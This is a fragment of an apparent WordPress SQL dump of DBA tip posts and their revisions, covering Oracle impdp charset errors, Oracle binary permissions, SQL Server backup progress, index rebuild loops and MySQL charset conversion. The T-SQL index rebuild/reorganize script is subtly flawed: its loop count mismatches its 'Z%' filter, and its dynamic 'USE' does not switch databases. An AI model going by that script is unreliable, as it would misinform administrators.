class=\"wp-block-syntaxhighlighter-code\">DECLARE\n CURSOR C1 IS\n SELECT * FROM SEMANTICS$;\n V_STATEMENT VARCHAR2(255);\n V_NC NUMBER(10);\n V_NT NUMBER(10);\nBEGIN\n EXECUTE IMMEDIATE \'SELECT COUNT(*) FROM SEMANTICS$\'\n INTO V_NC;\n EXECUTE IMMEDIATE \'SELECT COUNT(DISTINCT S_TABLE_NAME) FROM SEMANTICS$\'\n INTO V_NT;\n FOR R1 IN C1 LOOP\n V_STATEMENT := \'ALTER TABLE \' || R1.S_OWNER || \'.\' || R1.S_TABLE_NAME;\n V_STATEMENT := V_STATEMENT || \' MODIFY (\' || R1.S_COLUMN_NAME || \' \';\n V_STATEMENT := V_STATEMENT || R1.S_DATA_TYPE || \'(\' || R1.S_CHAR_LENGTH;\n V_STATEMENT := V_STATEMENT || \' CHAR));\';\n EXECUTE IMMEDIATE V_STATEMENT;\n END LOOP;\n DBMS_OUTPUT.PUT_LINE(\'DONE\');\nEND;</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>finally, we you have to import data to these tables: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>DATA_ONLY</b></pre>\n<!-- /wp:syntaxhighlighter/code -->\n','IMPDP Errors: ORA-02374, ORA-12899','','publish','open','open','','impdp-errors-ora-02374-ora-12899','','','2022-12-03 11:36:11','2022-12-03 11:36:11','',0,'http://ictbank.ir/blog/?p=56',0,'post','',0),
(57,2,'2020-02-02 12:16:02','2020-02-02 12:16:02','<!-- wp:paragraph -->\n<p>If the Character set of source and destination database are not equal, you will see below errors in the impdp log file: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">ORA-02374: conversion error loading table \"SCHEMA1\".\"TABLE1\" ORA-12899: value too large for column COLUMN1 (actual: 101, maximum: 100)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p> to solve this error, you have to restore the <strong>structure of tables</strong> first </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>METADATA_ONLY</b></pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to create a table and fill it with information about columns with have CHAR or VARCHAR datatype:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">CREATE TABLE SEMANTICS$\n(S_OWNER VARCHAR2(40),\nS_TABLE_NAME VARCHAR2(40),\nS_COLUMN_NAME VARCHAR2(40),\nS_DATA_TYPE VARCHAR2(40),\nS_CHAR_LENGTH NUMBER);\n\nINSERT INTO SEMANTICS$\n SELECT C.OWNER, C.TABLE_NAME, C.COLUMN_NAME, C.DATA_TYPE, C.CHAR_LENGTH\n FROM ALL_TAB_COLUMNS C, ALL_TABLES T\n WHERE C.OWNER = T.OWNER\n AND T.OWNER IN (\'[b]SCHEMA1[/b]\')\n -- ALL ORACLE PROVIDED USERS \n AND C.TABLE_NAME = T.TABLE_NAME\n AND C.CHAR_USED = \'B\' -- ONLY NEED TO LOOK FOR TABLES WHO ARE NOT YET CHAR SEMANTICS. \n AND T.PARTITIONED != \'YES\' -- EXCLUDE PARTITIONED TABLES\n AND C.TABLE_NAME NOT IN (SELECT TABLE_NAME FROM ALL_EXTERNAL_TABLES)\n AND C.DATA_TYPE IN (\'VARCHAR2\', \'CHAR\');\n COMMIT;</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then you have to modify these fields with alter table command as below: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">DECLARE\n CURSOR C1 IS\n SELECT * FROM SEMANTICS$;\n V_STATEMENT VARCHAR2(255);\n V_NC NUMBER(10);\n V_NT NUMBER(10);\nBEGIN\n EXECUTE IMMEDIATE \'SELECT COUNT(*) FROM SEMANTICS$\'\n INTO V_NC;\n EXECUTE IMMEDIATE \'SELECT COUNT(DISTINCT S_TABLE_NAME) FROM SEMANTICS$\'\n INTO V_NT;\n FOR R1 IN C1 LOOP\n V_STATEMENT := \'ALTER TABLE \' || R1.S_OWNER || \'.\' || R1.S_TABLE_NAME;\n V_STATEMENT := V_STATEMENT || \' MODIFY (\' || R1.S_COLUMN_NAME || \' \';\n V_STATEMENT := V_STATEMENT || R1.S_DATA_TYPE || \'(\' || R1.S_CHAR_LENGTH;\n V_STATEMENT := V_STATEMENT || \' CHAR));\';\n EXECUTE IMMEDIATE V_STATEMENT;\n END LOOP;\n DBMS_OUTPUT.PUT_LINE(\'DONE\');\nEND;</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>finally, we you have to import data to these tables: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>DATA_ONLY</b></pre>\n<!-- /wp:syntaxhighlighter/code -->\n','IMPDP Errors: ORA-02374, ORA-12899','','inherit','closed','closed','','56-revision-v1','','','2020-02-02 12:16:02','2020-02-02 12:16:02','',56,'http://ictbank.ir/blog/index.php/2020/02/02/56-revision-v1/',0,'revision','',0),
(58,2,'2020-02-02 12:16:30','2020-02-02 12:16:30','<!-- wp:paragraph -->\n<p>If the Character set of source and destination database are not equal, you will see below errors in the impdp log file: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">ORA-02374: conversion error loading table \"SCHEMA1\".\"TABLE1\" ORA-12899: value too large for column COLUMN1 (actual: 101, maximum: 100)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p> to solve this error, you have to restore the <strong>structure of tables</strong> first </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>METADATA_ONLY</b></pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to create a table and fill it with information about columns with have CHAR or VARCHAR datatype:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">CREATE TABLE SEMANTICS$\n(S_OWNER VARCHAR2(40),\nS_TABLE_NAME VARCHAR2(40),\nS_COLUMN_NAME VARCHAR2(40),\nS_DATA_TYPE VARCHAR2(40),\nS_CHAR_LENGTH NUMBER);\n\nINSERT INTO SEMANTICS$\n SELECT C.OWNER, C.TABLE_NAME, C.COLUMN_NAME, C.DATA_TYPE, C.CHAR_LENGTH\n FROM ALL_TAB_COLUMNS C, ALL_TABLES T\n WHERE C.OWNER = T.OWNER\n AND T.OWNER IN (\'[b]SCHEMA1[/b]\')\n -- ALL ORACLE PROVIDED USERS \n AND C.TABLE_NAME = T.TABLE_NAME\n AND C.CHAR_USED = \'B\' -- ONLY NEED TO LOOK FOR TABLES WHO ARE NOT YET CHAR SEMANTICS. \n AND T.PARTITIONED != \'YES\' -- EXCLUDE PARTITIONED TABLES\n AND C.TABLE_NAME NOT IN (SELECT TABLE_NAME FROM ALL_EXTERNAL_TABLES)\n AND C.DATA_TYPE IN (\'VARCHAR2\', \'CHAR\');\n COMMIT;</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then you have to modify these fields with alter table command as below: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">DECLARE\n CURSOR C1 IS\n SELECT * FROM SEMANTICS$;\n V_STATEMENT VARCHAR2(255);\n V_NC NUMBER(10);\n V_NT NUMBER(10);\nBEGIN\n EXECUTE IMMEDIATE \'SELECT COUNT(*) FROM SEMANTICS$\'\n INTO V_NC;\n EXECUTE IMMEDIATE \'SELECT COUNT(DISTINCT S_TABLE_NAME) FROM SEMANTICS$\'\n INTO V_NT;\n FOR R1 IN C1 LOOP\n V_STATEMENT := \'ALTER TABLE \' || R1.S_OWNER || \'.\' || R1.S_TABLE_NAME;\n V_STATEMENT := V_STATEMENT || \' MODIFY (\' || R1.S_COLUMN_NAME || \' \';\n V_STATEMENT := V_STATEMENT || R1.S_DATA_TYPE || \'(\' || R1.S_CHAR_LENGTH;\n V_STATEMENT := V_STATEMENT || \' CHAR));\';\n EXECUTE IMMEDIATE V_STATEMENT;\n END LOOP;\n DBMS_OUTPUT.PUT_LINE(\'DONE\');\nEND;</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>finally, we you have to import data to these tables: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>DATA_ONLY</b></pre>\n<!-- /wp:syntaxhighlighter/code -->\n','IMPDP Errors: ORA-02374, ORA-12899','','inherit','closed','closed','','56-revision-v1','','','2020-02-02 12:16:30','2020-02-02 12:16:30','',56,'http://ictbank.ir/blog/index.php/2020/02/02/56-revision-v1/',0,'revision','',0),
(60,2,'2020-02-02 12:44:50','2020-02-02 12:44:50','<!-- wp:paragraph -->\n<p>If you see <strong>Fatal NI connect error 12547</strong> error in alert log file of a Database in the middle of startup, and the database process couldn\'t find <strong>DB PARAMETER FILE</strong> and <strong>CONTROL FILE</strong>, you have to check permissions,owner and group of these files: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nls -l $GRID_HOME/bin/oracle\nls -l $ORACLE_HOME/bin/oracle\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>The permission of these files have to be <strong>6751</strong>.<br> The group of these files have to be <strong>oinstall</strong><br> The owner of first file have to be <strong>grid</strong> and the owner of second one have to be <strong>oracle</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nchown grid:oinstall $GRID_HOME/bin/oracle\nchmod 6751 $GRID_HOME/bin/oracle\n\nchown oracle:oinstall $ORACLE_HOME/bin/oracle\nchmod 6751 $ORACLE_HOME/bin/oracle\n<!-- /wp:syntaxhighlighter/code --> ','Database Startup Error: Fatal NI connect error 12547','','publish','open','open','','database-startup-error-fatal-ni-connect-error-12547','','','2020-03-26 00:52:49','2020-03-26 00:52:49','',0,'http://ictbank.ir/blog/?p=60',0,'post','',0),
(61,2,'2020-02-02 12:44:50','2020-02-02 12:44:50','<!-- wp:paragraph -->\n<p>If you see <strong>Fatal NI connect error 12547</strong> error in alert log file of a Database in the middle of startup, and the database process couldn\'t find <strong>DB PARAMETER FILE</strong> and <strong>CONTROL FILE</strong>, you have to check permissions,owner and group of these files: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nls -l $GRID_HOME/bin/oracle\nls -l $ORACLE_HOME/bin/oracle\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>The permission of these files have to be <strong>6751</strong>.<br> The group of these files have to be <strong>oinstall</strong><br> The owner of first file have to be <strong>grid</strong> and the owner of second one have to be <strong>oracle</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nchown grid:oinstall $GRID_HOME/bin/oracle\nchmod 6751 $GRID_HOME/bin/oracle\n\nchown oracle:oinstall $ORACLE_HOME/bin/oracle\nchmod 6751 $ORACLE_HOME/bin/oracle\n<!-- /wp:syntaxhighlighter/code --> ','Database Startup Error: Fatal NI connect error 12547','','inherit','closed','closed','','60-revision-v1','','','2020-02-02 12:44:50','2020-02-02 12:44:50','',60,'http://ictbank.ir/blog/index.php/2020/02/02/60-revision-v1/',0,'revision','',0),
(64,2,'2020-02-02 18:14:17','2020-02-02 18:14:17','<!-- wp:paragraph -->\n<p>To see the progress of Backup or Restore process you can use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nSELECT r.session_id AS [Session_Id]\n ,r.command AS [command]\n ,CONVERT(NUMERIC(6, 2), r.percent_complete) AS [% Complete]\n ,GETDATE() AS [Current Time]\n ,CONVERT(VARCHAR(20), DATEADD(ms, r.estimated_completion_time, GetDate()), 20) AS [Estimated Completion Time]\n ,CONVERT(NUMERIC(32, 2), r.total_elapsed_time / 1000.0 / 60.0) AS [Elapsed Min]\n ,CONVERT(NUMERIC(32, 2), r.estimated_completion_time / 1000.0 / 60.0) AS [Estimated Min]\n ,CONVERT(NUMERIC(32, 2), r.estimated_completion_time / 1000.0 / 60.0 / 60.0) AS [Estimated Hours]\n ,CONVERT(VARCHAR(1000), (\n SELECT SUBSTRING(TEXT, r.statement_start_offset / 2, CASE\n WHEN r.statement_end_offset = - 1\n THEN 1000\n ELSE (r.statement_end_offset - r.statement_start_offset) / 2\n END) \'Statement text\'\n FROM sys.dm_exec_sql_text(sql_handle)\n ))\nFROM sys.dm_exec_requests r\nWHERE command like \'RESTORE%\'\nor command like \'BACKUP%\'\n<!-- /wp:syntaxhighlighter/code --> ','Backup/Restore Progress','','publish','open','open','','backup-restore-progress','','','2020-03-26 00:52:42','2020-03-26 00:52:42','',0,'http://ictbank.ir/blog/?p=64',0,'post','',0),
(65,2,'2020-02-02 18:14:17','2020-02-02 18:14:17','<!-- wp:paragraph -->\n<p>To see the progress of Backup or Restore process you can use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nSELECT r.session_id AS [Session_Id]\n ,r.command AS [command]\n ,CONVERT(NUMERIC(6, 2), r.percent_complete) AS [% Complete]\n ,GETDATE() AS [Current Time]\n ,CONVERT(VARCHAR(20), DATEADD(ms, r.estimated_completion_time, GetDate()), 20) AS [Estimated Completion Time]\n ,CONVERT(NUMERIC(32, 2), r.total_elapsed_time / 1000.0 / 60.0) AS [Elapsed Min]\n ,CONVERT(NUMERIC(32, 2), r.estimated_completion_time / 1000.0 / 60.0) AS [Estimated Min]\n ,CONVERT(NUMERIC(32, 2), r.estimated_completion_time / 1000.0 / 60.0 / 60.0) AS [Estimated Hours]\n ,CONVERT(VARCHAR(1000), (\n SELECT SUBSTRING(TEXT, r.statement_start_offset / 2, CASE\n WHEN r.statement_end_offset = - 1\n THEN 1000\n ELSE (r.statement_end_offset - r.statement_start_offset) / 2\n END) \'Statement text\'\n FROM sys.dm_exec_sql_text(sql_handle)\n ))\nFROM sys.dm_exec_requests r\nWHERE command like \'RESTORE%\'\nor command like \'BACKUP%\'\n<!-- /wp:syntaxhighlighter/code --> ','Backup/Restore Progress','','inherit','closed','closed','','64-revision-v1','','','2020-02-02 18:14:17','2020-02-02 18:14:17','',64,'http://ictbank.ir/blog/index.php/2020/02/02/64-revision-v1/',0,'revision','',0),
(66,2,'2020-02-02 18:19:06','2020-02-02 18:19:06','<!-- wp:paragraph -->\n<p>If you want to <strong>REBUILD</strong> and <strong>REORGANIZE </strong>all your indexes in a database, you have to use this query:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rebuild:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nDECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' rebuild;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Reorganize:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nDECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' reorganize;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n\n<!-- /wp:syntaxhighlighter/code --> ','Rebuild and Reorganize all indexes within a database','','publish','open','open','','rebuild-and-reorganize-all-indexes-within-a-database','','','2020-03-26 00:52:33','2020-03-26 00:52:33','',0,'http://ictbank.ir/blog/?p=66',0,'post','',0),
(67,2,'2020-02-02 18:19:06','2020-02-02 18:19:06','<!-- wp:paragraph -->\n<p>If you want to <strong>REBUILD</strong> and <strong>REORGANIZE </strong>all your indexes in a database, you have to use this query:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rebuild:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nDECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' rebuild;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Reorganize:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nDECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' reorganize;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n\n<!-- /wp:syntaxhighlighter/code --> ','Rebuild and Reorganize all indexes within a database','','inherit','closed','closed','','66-revision-v1','','','2020-02-02 18:19:06','2020-02-02 18:19:06','',66,'http://ictbank.ir/blog/index.php/2020/02/02/66-revision-v1/',0,'revision','',0),
(68,2,'2020-02-02 18:28:09','2020-02-02 18:28:09','<!-- wp:paragraph -->\n<p>To change the Character Set and Collation of a field of a table you have to use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nALTER TABLE table_name MODIFY column_name data_type CHARACTER SET UTF8 COLLATE UTF8_UNICODE_CI;\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>if the table contains data, you have to update that data as follow: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nUPDATE table_name SET column_name= CONVERT(CAST(CONVERT(column_name USING LATIN1) AS BINARY) USING UTF8)\n<!-- /wp:syntaxhighlighter/code --> ','Change the Character Set & Collation of a table','','publish','open','open','','change-the-character-set-collation-of-a-table','','','2020-03-26 00:52:25','2020-03-26 00:52:25','',0,'http://ictbank.ir/blog/?p=68',0,'post','',0),
(69,2,'2020-02-02 18:28:09','2020-02-02 18:28:09','<!-- wp:paragraph -->\n<p>To change the Character Set and Collation of a field of a table you have to use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nALTER TABLE table_name MODIFY column_name data_type CHARACTER SET UTF8 COLLATE UTF8_UNICODE_CI;\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>if the table contains data, you have to update that data as follow: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nUPDATE table_name SET column_name= CONVERT(CAST(CONVERT(column_name USING LATIN1) AS BINARY) USING UTF8)\n<!-- /wp:syntaxhighlighter/code --> ','Change the Character Set & Collation of a table','','inherit','closed','closed','','68-revision-v1','','','2020-02-02 18:28:09','2020-02-02 18:28:09','',68,'http://ictbank.ir/blog/index.php/2020/02/02/68-revision-v1/',0,'revision','',0),
(80,2,'2020-02-02 21:14:11','2020-02-02 21:14:11','<!-- wp:paragraph -->\n<p>If you want to <strong>REBUILD</strong> and <strong>REORGANIZE </strong>all your indexes in a database, you have to use this query:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rebuild:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nDECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n 